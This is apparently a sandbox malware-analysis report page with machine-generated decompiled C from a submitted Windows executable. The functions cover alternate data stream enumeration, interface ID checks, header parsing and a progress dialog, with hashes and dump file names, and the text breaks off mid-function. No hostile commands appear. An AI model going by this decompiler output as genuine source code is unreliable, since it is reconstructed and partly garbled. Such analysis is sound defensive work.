0x00406e07
0x00000000
0x00406e07
0x00406cf8
0x00406cf9
0x00406cfe
0x00406cff
0x00406d09
0x00406d0b
0x00406d0e
0x00406d10
0x00000000
0x00406d10
0x00406d18
0x00406d19
0x00406d1e
0x00406d1f
0x00406d29
0x00406d2b
0x00406d2e
0x00406d30
0x00000000
0x00406d30
0x00406d38
0x00406d39
0x00406d3e
0x00406d3f
0x00406d49
0x00406d4b
0x00406d4e
0x00406d50
0x00000000
0x00406d50
0x00406d58
0x00406d59
0x00406d5e
0x00406d5f
0x00406d69
0x00406d6b
0x00406d6e
0x00406d70
0x00000000
0x00406d70
0x00406d78
0x00406d79
0x00406d7e
0x00406d7f
0x00406d89
0x00406d8b
0x00406d8e
0x00406d90
0x00000000
0x00406d90
0x00406d95
0x00406d96
0x00406d9b
0x00406d9c
0x00406da6
0x00406da8
0x00406dab
0x00406dad
0x00000000
0x00406dad
0x00406db2
0x00406db3
0x00406db8
0x00406db9
0x00406dc3
0x00406dc5
0x00406dc8
0x00406dca
0x00000000
0x00406dca
0x00406dcf
0x00406dd5
0x00406dd6
0x00406dd7
0x00406de1
0x00000000
0x00406e10
0x00406de3
0x00406de9
0x00406dec
0x00406dfc
0x00406dfc
0x00406dfe
0x00000000
0x00406dfe
0x00406dee
0x00406df6
0x00406dfa
0x00000000
0x00000000
0x00406e19

APIs

memcmp.MSVCRT ref: 00406CAF
memcmp.MSVCRT ref: 00406CCC
memcmp.MSVCRT ref: 00406CDF

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 35e1d9353c972ffb1d5c621511119ceb4edb1679282bba52ecb09f52cd819193
Instruction ID: 51bef7657f4b217767cf2214e4817ef679418496c32ecdcb676d7bec614d087e
Opcode Fuzzy Hash: 35e1d9353c972ffb1d5c621511119ceb4edb1679282bba52ecb09f52cd819193
Instruction Fuzzy Hash: 12417575A00718ABE6105A11EC41AEB736CDE64758B11002AFC4BB7681EB38AEA486DD

Uniqueness

Uniqueness Score: -1.00%

Function 00404C22, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C22() {
				CHAR* _t7;

				_t7 = "kernel32.dll";
				 *0x41f16c = GetProcAddress(GetModuleHandleA(_t7), "FindFirstStreamW");
				 *0x41f168 = GetProcAddress(GetModuleHandleA(_t7), "FindNextStreamW");
				return 0x41f164;
			}

0x00404c3b
0x00404c59
0x00404c63
0x00404c6e

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,FindFirstStreamW), ref: 00404C48
GetProcAddress.KERNEL32(00000000), ref: 00404C51
GetModuleHandleA.KERNEL32(kernel32.dll,FindNextStreamW), ref: 00404C5E
GetProcAddress.KERNEL32(00000000), ref: 00404C61

Strings

FindNextStreamW, xrefs: 00404C53
kernel32.dll, xrefs: 00404C3B, 00404C47, 00404C58
FindFirstStreamW, xrefs: 00404C40

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
API String ID: 1646373207-4044117955
Opcode ID: a0e0ffeeea9361e73f572bd643a1eadea7e86d774db87774120aa9dc83c52679
Instruction ID: b848578b948c886adf4ab909bcc43a8b23ab1992de3229df41bf613d256c2862
Opcode Fuzzy Hash: a0e0ffeeea9361e73f572bd643a1eadea7e86d774db87774120aa9dc83c52679
Instruction Fuzzy Hash: 08E012B1A45318BA960067B9AC848A7BA9CD9D93623154437A214E3250D6F95C458BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE2C, Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 226
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040EE2C(signed int** __ecx, signed int __edx, void* __eflags, signed int* _a4, char _a7) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int** _v44;
				signed int _v48;
				void* __ebp;
				signed int* _t111;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t121;
				signed int _t123;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t134;
				signed int _t138;
				signed int _t145;
				signed int _t148;
				signed int** _t149;
				signed int _t157;
				signed int _t162;
				void* _t170;
				signed int** _t175;
				signed int _t177;
				intOrPtr* _t180;
				intOrPtr _t181;
				signed int _t182;
				intOrPtr* _t183;
				signed int* _t185;

				_t173 = __edx;
				_t175 = __ecx;
				_v44 = __ecx;
				_t148 = E0040EB3D(__ecx, __edx, __eflags);
				_v28 = _t148;
				if(_t148 == 0) {
					_push(0x41de18);
					_push( &_a7);
					L00418E02();
				}
				_push(_t148);
				E00410BF8(_a4);
				_v16 = 0;
				_v12 = 0;
				if(_t148 <= 0) {
					L22:
					_t111 = _a4;
					_t148 = _t148 - 1;
					_t66 = _t111 + 8; // 0x8
					_t180 = _t66;
					_v28 = _t180;
					E00410C85(_t180, _t148);
					_v12 = _v12 & 0x00000000;
					_t197 = _t148;
					if(_t148 > 0) {
						goto L27;
					}
				} else {
					_v24 = 0;
					while(1) {
						_t185 = _v24 +  *_a4;
						_t123 = E0040E9B4(_t175);
						_v5 = _t123;
						if((_t123 & 0x000000c0) != 0) {
							break;
						}
						_t162 = _t123 & 0x0000000f;
						_v40 = _t162;
						if(_t162 > 8) {
							L25:
							_push(0x41de18);
							_push( &_a7);
							L00418E02();
							L26:
							_t180 = _v28;
							L27:
							_t183 =  *_t180 + _v12 * 8;
							 *_t183 = E0040EB3D(_t175, _t173, _t197);
							_t121 = E0040EB3D(_t175, _t173, _t197);
							_v12 = _v12 + 1;
							 *((intOrPtr*)(_t183 + 4)) = _t121;
							if(_v12 < _t148) {
								goto L26;
							}
						} else {
							_t129 =  *((intOrPtr*)(_t175 + 8));
							_t173 =  *((intOrPtr*)(_t175 + 4)) - _t129;
							if(_t162 > _t173) {
								goto L25;
							} else {
								_t130 = _t129 +  *_t175;
								_t148 = 0;
								_v48 = _v48 & 0;
								_v20 = _v20 & 0;
								_v32 = _t130;
								if(_t162 > 0) {
									while(1) {
										asm("cdq");
										_t170 = 8;
										_v36 =  *(_v20 + _t130) & 0x000000ff;
										_t177 = _t173;
										_t173 = _v48;
										_t145 = E004190E0(_t148, _t170, _t173);
										_v20 = _v20 + 1;
										_t148 = _v36 | _t145;
										_t162 = _v40;
										_v48 = _t177 | _t173;
										if(_v20 >= _t162) {
											break;
										}
										_t130 = _v32;
									}
									_t175 = _v44;
								}
								_t194 = _v5 & 0x00000010;
								 *((intOrPtr*)(_t175 + 8)) =  *((intOrPtr*)(_t175 + 8)) + _t162;
								 *_t185 = _t148;
								_t185[1] = _v48;
								if((_v5 & 0x00000010) == 0) {
									_t185[4] = 1;
								} else {
									_t185[4] = E0040EB3D(_t175, _t173, _t194);
									E0040EB3D(_t175, _t173, _t194);
								}
								_t195 = _v5 & 0x00000020;
								if((_v5 & 0x00000020) == 0) {
									_t134 = _t185[2];
									__eflags = _t134;
									if(_t134 != 0) {
										E00403204(_t134, _t134);
										_t51 =  &(_t185[2]);
										 *_t51 = _t185[2] & 0x00000000;
										__eflags =  *_t51;
									}
									_t53 =  &(_t185[3]);
									 *_t53 = _t185[3] & 0x00000000;
									__eflags =  *_t53;
								} else {
									_t138 = E0040EB3D(_t175, _t173, _t195);
									_t148 =  &(_t185[2]);
									_v40 = _t138;
									E00407AB8(_t148, _t138);
									E0040E9D2(_t175,  *_t148, _v40);
								}
								_v24 = _v24 + 0x18;
								_v16 = _v16 + _t185[4];
								_v12 = _v12 + 1;
								if(_v12 < _v28) {
									continue;
								} else {
									_t148 = _v28;
									goto L22;
								}
							}
						}
						goto L28;
					}
					_push(0x41de18);
					_push( &_a7);
					L00418E02();
					goto L25;
				}
				L28:
				_t181 = _v16;
				if(_t181 < _t148) {
					_push(0x41de18);
					_push( &_a7);
					L00418E02();
				}
				_t113 = _a4;
				_t182 = _t181 - _t148;
				_t89 = _t113 + 0x10; // 0x10
				_t149 = _t89;
				_v44 = _t149;
				_t114 = E00410CC3(_t149, _t182);
				if(_t182 != 1) {
					L44:
					_v12 = _v12 & 0x00000000;
					_t209 = _t182;
					if(_t182 > 0) {
						while(1) {
							_t114 = E0040EB3D(_t175, _t173, _t209);
							_v12 = _v12 + 1;
							( *_t149)[_v12] = _t114;
							if(_v12 >= _t182) {
								goto L48;
							}
							_t149 = _v44;
						}
					}
				} else {
					_t173 = 0;
					if(_v16 > 0) {
						_t114 = _a4;
						_t182 = _t114[3];
						do {
							_t157 = 0;
							if(_t182 <= 0) {
								L37:
								_t157 = _t157 | 0xffffffff;
							} else {
								_t114 =  *_v28;
								while( *_t114 != _t173) {
									_t157 = _t157 + 1;
									_t114 =  &(_t114[2]);
									if(_t157 < _t182) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							if(_t157 < 0) {
								_t114 =  *_t149;
								 *_t114 = _t173;
							} else {
								goto L39;
							}
							goto L42;
							L39:
							_t173 = _t173 + 1;
						} while (_t173 < _v16);
					}
					L42:
					if(_t173 == _v16) {
						_push(0x41de18);
						_t114 =  &_a7;
						_push(_t114);
						L00418E02();
						goto L44;
					}
				}
				L48:
				return _t114;
			}

0x0040ee2c
0x0040ee35
0x0040ee37
0x0040ee3f
0x0040ee45
0x0040ee48
0x0040ee4d
0x0040ee58
0x0040ee59
0x0040ee59
0x0040ee61
0x0040ee62
0x0040ee69
0x0040ee6c
0x0040ee6f
0x0040ef8a
0x0040ef8a
0x0040ef8d
0x0040ef8f
0x0040ef8f
0x0040ef94
0x0040ef97
0x0040ef9c
0x0040efa0
0x0040efa2
0x00000000
0x0040efa4
0x0040ee75
0x0040ee75
0x0040ee78
0x0040ee80
0x0040ee82
0x0040ee89
0x0040ee8c
0x00000000
0x00000000
0x0040ee95
0x0040ee9a
0x0040ee9d
0x0040efba
0x0040efbd
0x0040efc8
0x0040efc9
0x0040efce
0x0040efce
0x0040efd1
0x0040efd6
0x0040efe2
0x0040efe4
0x0040efe9
0x0040efec
0x0040eff2
0x00000000
0x00000000
0x0040eea3
0x0040eea3
0x0040eea9
0x0040eead
0x00000000
0x0040eeb3
0x0040eeb3
0x0040eeb5
0x0040eeb7
0x0040eeba
0x0040eebf
0x0040eec2
0x0040eec9
0x0040eed2
0x0040eed5
0x0040eed6
0x0040eed9
0x0040eedb
0x0040eee0
0x0040eeec
0x0040eeef
0x0040eef1
0x0040eef7
0x0040eefa
0x00000000
0x00000000
0x0040eec6
0x0040eec6
0x0040eefc
0x0040eefc
0x0040ef04
0x0040ef08
0x0040ef0e
0x0040ef10
0x0040ef13
0x0040ef28
0x0040ef15
0x0040ef1e
0x0040ef21
0x0040ef21
0x0040ef2f
0x0040ef33
0x0040ef58
0x0040ef5b
0x0040ef5d
0x0040ef60
0x0040ef65
0x0040ef65
0x0040ef65
0x0040ef69
0x0040ef6a
0x0040ef6a
0x0040ef6a
0x0040ef35
0x0040ef37
0x0040ef3c
0x0040ef42
0x0040ef45
0x0040ef51
0x0040ef51
0x0040ef71
0x0040ef75
0x0040ef78
0x0040ef81
0x00000000
0x0040ef87
0x0040ef87
0x00000000
0x0040ef87
0x0040ef81
0x0040eead
0x00000000
0x0040ee9d
0x0040efa9
0x0040efb4
0x0040efb5
0x00000000
0x0040efb5
0x0040eff4
0x0040eff4
0x0040eff9
0x0040effe
0x0040f009
0x0040f00a
0x0040f00a
0x0040f00f
0x0040f012
0x0040f015
0x0040f015
0x0040f01a
0x0040f01d
0x0040f025
0x0040f077
0x0040f077
0x0040f07b
0x0040f07d
0x0040f084
0x0040f088
0x0040f090
0x0040f096
0x0040f099
0x00000000
0x00000000
0x0040f081
0x0040f081
0x0040f084
0x0040f027
0x0040f027
0x0040f02c
0x0040f02e
0x0040f031
0x0040f034
0x0040f034
0x0040f038
0x0040f04b
0x0040f04b
0x0040f03a
0x0040f03d
0x0040f03f
0x0040f043
0x0040f044
0x0040f049
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f049
0x0040f03f
0x0040f04e
0x0040f050
0x0040f05a
0x0040f05c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f052
0x0040f052
0x0040f053
0x0040f058
0x0040f05e
0x0040f061
0x0040f066
0x0040f06e
0x0040f071
0x0040f072
0x00000000
0x0040f072
0x0040f061
0x0040f09f
0x0040f09f

APIs

Part of subcall function 0040EB3D: _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EB60

_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EE59
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EFB5
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EFC9
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F00A
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F072

Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208

Strings

, xrefs: 0040EF2F

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ExceptionThrow$free
String ID:
API String ID: 3129652135-3916222277
Opcode ID: e26337be683b5af4c30aef131a22ba05f72600e83a284499b723228e6f86e7e5
Instruction ID: b719d39ac1e1c0dfc465c254aa8864d8cdc5b6410d67c82479710a15fcd5db0f
Opcode Fuzzy Hash: e26337be683b5af4c30aef131a22ba05f72600e83a284499b723228e6f86e7e5
Instruction Fuzzy Hash: 7F918271E00309ABCF14DFA5C4815AEBBB5AF49314F10847FE855BB382C738AA958B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA18, Relevance: 7.6, APIs: 5, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040BA18(void* __ecx, void* __edx) {
				void* _t47;
				void* _t55;
				signed int _t59;
				intOrPtr _t60;
				void* _t74;
				void* _t77;
				struct _CRITICAL_SECTION* _t80;
				signed int _t81;
				void* _t83;

				_t74 = __edx;
				E00418D80(E0041A0A4, _t83);
				_t77 = __ecx;
				_t80 = __ecx + 0x40;
				if(E0040B871(_t80) == 0) {
					E0040BC1B(__ecx);
					EnterCriticalSection(_t80);
					_t59 =  *(_t80 + 0x20);
					 *(_t83 - 0x10) =  *(_t80 + 0x24);
					 *((intOrPtr*)(_t83 - 0x20)) =  *((intOrPtr*)(_t80 + 0x28));
					 *((intOrPtr*)(_t83 - 0x1c)) =  *((intOrPtr*)(_t80 + 0x2c));
					LeaveCriticalSection(_t80);
					if(_t59 !=  *((intOrPtr*)(_t77 + 0x28)) ||  *(_t83 - 0x10) !=  *((intOrPtr*)(_t77 + 0x2c))) {
						E0040B92C(_t77, _t59,  *(_t83 - 0x10));
					}
					E0040B99F(_t77,  *((intOrPtr*)(_t83 - 0x20)),  *((intOrPtr*)(_t83 - 0x1c)));
					_t81 = 0;
					if((_t59 |  *(_t83 - 0x10)) == 0) {
						 *(_t83 - 0x10) = _t81;
						_t59 = 1;
					}
					_t60 = E00418F90(E004190A0( *((intOrPtr*)(_t83 - 0x20)),  *((intOrPtr*)(_t83 - 0x1c)), 0x64, _t81), _t74, _t59,  *(_t83 - 0x10));
					if(_t60 !=  *((intOrPtr*)(_t77 + 0x34))) {
						asm("cdq");
						E0040315D(_t83 - 0xa4, _t46, _t74);
						E004036B0(_t83 - 0x18, _t83 - 0xa4);
						 *(_t83 - 4) = _t81;
						E004039D8(_t83 - 0x18, "% ");
						_t55 = E00403204(SetWindowTextW( *(_t77 + 4),  *(E00403632(_t83 - 0x24, _t83 - 0x18, _t77 + 0xc))),  *((intOrPtr*)(_t83 - 0x24)));
						 *((intOrPtr*)(_t77 + 0x34)) = _t60;
						E00403204(_t55,  *((intOrPtr*)(_t83 - 0x18)));
					}
					_t47 = 1;
				} else {
					_t47 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
				return _t47;
			}

0x0040ba18
0x0040ba1d
0x0040ba2a
0x0040ba2c
0x0040ba38
0x0040ba44
0x0040ba4a
0x0040ba53
0x0040ba56
0x0040ba5c
0x0040ba63
0x0040ba66
0x0040ba6f
0x0040ba7f
0x0040ba7f
0x0040ba8c
0x0040ba98
0x0040ba99
0x0040ba9d
0x0040baa0
0x0040baa0
0x0040baba
0x0040babf
0x0040bac1
0x0040baca
0x0040bad9
0x0040bae6
0x0040bae9
0x0040bb0b
0x0040bb13
0x0040bb16
0x0040bb1c
0x0040bb1d
0x0040ba3a
0x0040ba3a
0x0040ba3a
0x0040bb25
0x0040bb2d

APIs

__EH_prolog.LIBCMT ref: 0040BA1D

Part of subcall function 0040B871: EnterCriticalSection.KERNEL32(?,?,?,0040BB91), ref: 0040B876
Part of subcall function 0040B871: LeaveCriticalSection.KERNEL32(?,?,?,0040BB91), ref: 0040B880

EnterCriticalSection.KERNEL32(?), ref: 0040BA4A
LeaveCriticalSection.KERNEL32(?), ref: 0040BA66
__aulldiv.LIBCMT ref: 0040BAB5
SetWindowTextW.USER32(?,00000000), ref: 0040BB02

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: CriticalSection$EnterLeave$H_prologTextWindow__aulldiv
String ID:
API String ID: 729368748-0
Opcode ID: dae6ce3810544a55a0cadaf366efc3d68dae998be2ac9b3ae07b387af689c148
Instruction ID: cd95b3165d2d8f135bb25e3b680c2f95c897e520c5a9096d40279e617bd503f6
Opcode Fuzzy Hash: dae6ce3810544a55a0cadaf366efc3d68dae998be2ac9b3ae07b387af689c148
Instruction Fuzzy Hash: CB313075A00219AFCB11EFA5CC419EEBBB9FF48314F00442AF515B3691C739A955CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B88B, Relevance: 7.5, APIs: 5, Instructions: 37
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B88B(void* __ecx) {
				void* _t30;

				_t30 = __ecx;
				 *(__ecx + 0x28) =  *(__ecx + 0x28) | 0xffffffff;
				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
				 *(__ecx + 0x34) =  *(__ecx + 0x34) | 0xffffffff;
				 *((char*)(__ecx + 0x38)) = 1;
				E00418AC0(__ecx + 0x3c);
				 *((intOrPtr*)(_t30 + 0x30)) = GetDlgItem( *(__ecx + 4), 0x64);
				if( *(_t30 + 0x70) >= 0) {
					SendMessageW( *(_t30 + 4), 0x80, 1, LoadIconW( *0x41f158,  *(_t30 + 0x70) & 0x0000ffff));
				}
				 *((intOrPtr*)(_t30 + 8)) = SetTimer( *(_t30 + 4), 3, 0x64, 0);
				SetWindowTextW( *(_t30 + 4),  *(_t30 + 0xc));
				E0040BC1B(_t30);
				return 1;
			}

0x0040b88c
0x0040b88e
0x0040b892
0x0040b896
0x0040b89d
0x0040b8a1
0x0040b8b5
0x0040b8b8
0x0040b8d6
0x0040b8d6
0x0040b8ee
0x0040b8f4
0x0040b8fc
0x0040b904

APIs

Part of subcall function 00418AC0: SetEvent.KERNEL32(?,00407A1F), ref: 00418AC3

GetDlgItem.USER32 ref: 0040B8AB
LoadIconW.USER32(00000000), ref: 0040B8C5
SendMessageW.USER32(?,00000080,00000001,00000000), ref: 0040B8D6
SetTimer.USER32 ref: 0040B8E5
SetWindowTextW.USER32(?,?), ref: 0040B8F4

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: EventIconItemLoadMessageSendTextTimerWindow
String ID:
API String ID: 2712766465-0
Opcode ID: 699a61a99574d7652e0115c874616cdfe84062a62bf2c7ffebd4a9624ea64153
Instruction ID: e294c04aeed814171d4adbec44afb40f75d5ab8e46fef825956d7cc37fe38289
Opcode Fuzzy Hash: 699a61a99574d7652e0115c874616cdfe84062a62bf2c7ffebd4a9624ea64153
Instruction Fuzzy Hash: D9011A30040B40AFE7215B21DD5ABA6BBA1FB05720F008A2DFAA7959F0C775B852CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004065FE, Relevance: 6.3, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E004065FE(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				signed int _t19;
				intOrPtr _t20;
				signed int* _t21;

				_t21 = _a12;
				_t20 = _a8;
				 *_t21 =  *_t21 & 0x00000000;
				_push(0x10);
				_push(0x41c24c);
				_push(_t20);
				L00418DA0();
				if(_t12 != 0) {
					_push(0x10);
					_push(0x41b390);
					_push(_t20);
					L00418DA0();
					if(_t12 == 0) {
						goto L1;
					}
					_push(0x10);
					_push(0x41b370);
					_push(_t20);
					L00418DA0();
					if(_t12 != 0) {
						_push(0x10);
						_push(0x41b350);
						_push(_t20);
						L00418DA0();
						if(_t12 != 0) {
							_push(0x10);
							_push(0x41b340);
							_push(_t20);
							L00418DA0();
							if(_t12 != 0) {
								return 0x80004002;
							}
							_t13 = _a4;
							_t16 = _t13;
							_t19 = _t13 + 0xc;
							L9:
							asm("sbb ecx, ecx");
							 *_t21 =  ~_t16 & _t19;
							L10:
							 *((intOrPtr*)(_t13 + 0x10)) =  *((intOrPtr*)(_t13 + 0x10)) + 1;
							return 0;
						}
						_t13 = _a4;
						_t16 = _t13;
						_t19 = _t13 + 8;
						goto L9;
					}
					_t13 = _a4;
					_t16 = _t13;
					_t19 = _t13 + 4;
					goto L9;
				}
				L1:
				_t13 = _a4;
				 *_t21 = _t13;
				goto L10;
			}

0x00406602
0x00406606
0x00406609
0x0040660c
0x0040660e
0x00406613
0x00406614
0x0040661e
0x00406627
0x00406629
0x0040662e
0x0040662f
0x00406639
0x00000000
0x00000000
0x0040663b
0x0040663d
0x00406642
0x00406643
0x0040664d
0x00406659
0x0040665b
0x00406660
0x00406661
0x0040666b
0x00406677
0x00406679
0x0040667e
0x0040667f
0x00406689
0x00000000
0x004066a2
0x0040668b
0x0040668e
0x00406690
0x00406693
0x00406695
0x00406699
0x0040669b
0x0040669b
0x00000000
0x0040669e
0x0040666d
0x00406670
0x00406672
0x00000000
0x00406672
0x0040664f
0x00406652
0x00406654
0x00000000
0x00406654
0x00406620
0x00406620
0x00406623
0x00000000

APIs

memcmp.MSVCRT ref: 00406614
memcmp.MSVCRT ref: 0040662F
memcmp.MSVCRT ref: 00406643

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: fc4689e578dc1cf89ed0c55786c74f8cf84f4324eb775046ffdacad481ac018b
Instruction ID: a37c9b6fd46fbe13aac1983c9063a21cde19e2a8279128ea102ca4b182acfc17
Opcode Fuzzy Hash: fc4689e578dc1cf89ed0c55786c74f8cf84f4324eb775046ffdacad481ac018b
Instruction Fuzzy Hash: 9411E931740304A7D7104F15EC02FEA73A89B94714F15483EFC4ABA3C2E67AF9A0969D

Uniqueness

Uniqueness Score: -1.00%

Function 00404C6F, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404C6F(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v604;
				intOrPtr _t8;
				intOrPtr* _t15;

				_t15 = __ecx;
				if(E00404B27(__ecx) == 0) {
					L6:
					return 0;
				}
				if( *0x41f16c != 0) {
					SetLastError(0);
					_t8 =  *0x41f16c(_a4, 0,  &_v604, 0);
					 *_t15 = _t8;
					if(_t8 != 0xffffffff || GetLastError() != 0x26) {
						if( *_t15 != 0xffffffff) {
							E00404CE3( &_v604, _a8);
							return 1;
						}
					}
					goto L6;
				}
				SetLastError(0x78);
				goto L6;
			}

0x00404c79
0x00404c82
0x00404cca
0x00000000
0x00404cca
0x00404c8b
0x00404c99
0x00404cad
0x00404cb6
0x00404cb8
0x00404cc8
0x00404cd7
0x00000000
0x00404cdc
0x00404cc8
0x00000000
0x00404cb8
0x00404c8f
0x00000000

APIs

Part of subcall function 00404B27: FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32

SetLastError.KERNEL32(00000078), ref: 00404C8F
SetLastError.KERNEL32(00000000), ref: 00404C99
FindFirstStreamW.KERNELBASE(?,00000000,?,00000000), ref: 00404CAD
GetLastError.KERNEL32 ref: 00404CBA

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ErrorLast$Find$CloseFirstStream
String ID:
API String ID: 4071060300-0
Opcode ID: e8f944988b9cb325842934f4d91b529ed218fe4a6d3146ed212e3958b088d38e
Instruction ID: e0df3afe617d72e22a27f99f1303fe5809e056bbf20cba425ebf9683b02a63d2
Opcode Fuzzy Hash: e8f944988b9cb325842934f4d91b529ed218fe4a6d3146ed212e3958b088d38e
Instruction Fuzzy Hash: 05F0F970405605E7EB202F20DC0D79637249B91326F104336E665B72E0C7B89D8ACB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00409970, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00409970(void* __ecx, void* __eflags) {
				intOrPtr* _t106;
				intOrPtr* _t110;
				signed int _t111;
				intOrPtr* _t114;
				signed int _t115;
				intOrPtr* _t118;
				signed int _t119;
				intOrPtr* _t121;
				signed int _t122;
				signed int _t126;
				signed int _t129;
				char* _t130;
				char* _t133;
				void* _t138;
				intOrPtr _t141;
				intOrPtr _t161;
				void* _t175;
				void* _t176;
				signed int _t180;
				void* _t181;
				intOrPtr* _t182;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t190;

				E00418D80(E00419D58, _t190);
				_t188 = __ecx;
				_t106 = __ecx + 0xb0;
				_t182 = __ecx + 0xa8;
				 *((char*)(__ecx + 0xb8)) = 0;
				 *_t106 = 0;
				 *((intOrPtr*)(_t106 + 4)) = 0;
				 *_t182 = 0;
				 *((intOrPtr*)(_t182 + 4)) = 0;
				asm("sbb ecx, [ebp+0x10]");
